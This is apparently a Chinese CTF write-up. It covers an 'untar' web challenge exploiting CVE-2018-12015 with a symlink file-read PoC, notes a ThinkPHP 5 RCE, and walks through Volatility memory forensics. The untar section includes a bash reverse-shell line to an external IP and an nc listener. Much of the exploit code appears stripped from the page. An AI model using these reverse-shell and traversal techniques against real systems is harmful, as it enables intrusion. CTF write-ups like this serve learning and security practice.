web
untar
直接访问题目可以看到源码
1 |
|
但是直接传马发现不解析,于是搜索了一下,发现 CVE-2018-12015: Archive::Tar: directory traversal
利用这个软连接可以来进行任意文件读取,具体poc如下:
1 | ln -s /var/www/html/index.php content |
1 | http://183.129.189.62:16407/?url=http://ezlovell.zeroyu.xyz:2233/exp.tar&filename=exp.tar |
但是这个方法没有办法读取到flag
之后参考之前hitcon的ssrfme一题,发现可以在UNTAR处进行RCE,因此有了如下的exp:
1 | 服务器信息:202.182.115.203 2233 |
首先在服务器的z3文件中写入如下语句,方便后续执行进行反弹shell
1 | bash -i >& /dev/tcp/202.182.115.203/2333 0<&1 2>&1 |
之后启动监听和一句话服务器,一句话服务器主要用于下载z3文件
1 | php -S 0.0.0.0:2233 nc -lvp 2333 |
之后按照顺序执行下列语句即可获取反弹的shell
1 | exp: |
thinkphp?
做出来的唯一一道web题- -,平时接触RCE算比较多,刚好这题还是tp5的RCE,exp如下:
1 | POST / |
misc
Ezmemory
拿到一个raw为后缀的文件,刚开始百度查的时候还以为是图片啥的,后面才反应过来是linux的镜像文件。。
看大佬的write up用的是一款内存取证和分析工具–volatility,俺也没用过,贴上安全客上的wp;
volatility -f mem.raw imageinfo
获取镜像系统信息
--profile=Win7SP1x64
指定操作系统
volatility -f mem.raw --profile=Win7SP1x64 pslist
列出所有进程
发现有一个cmd
进程
volatility -f mem.raw --profile=Win7SP1x64 cmdscan
查看命令行上的操作
得到flag。